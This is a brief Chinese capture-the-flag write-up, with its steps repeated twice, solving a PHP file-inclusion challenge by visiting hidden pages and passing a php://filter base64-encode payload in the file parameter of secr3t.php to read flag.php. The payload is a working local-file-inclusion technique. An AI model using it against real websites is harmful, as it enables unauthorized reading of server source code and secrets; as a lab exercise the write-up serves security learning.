打开题目
查看源码
直接访问Archive_room.php
第二个页面是个点击框,这里bp抓包确认;若是直接SECRET,会跳到end.php
直接访问secr3t.php
代码审计一下
playload:secr3t.php?file=flag.php
改为php协议读取权限
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码得到flag
打开题目
查看源码
直接访问Archive_room.php
第二个页面是个点击框,这里bp抓包确认;若是直接SECRET,会跳到end.php
直接访问secr3t.php
代码审计一下
playload:secr3t.php?file=flag.php
改为php协议读取权限
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码得到flag
版权声明:
本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。
我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com
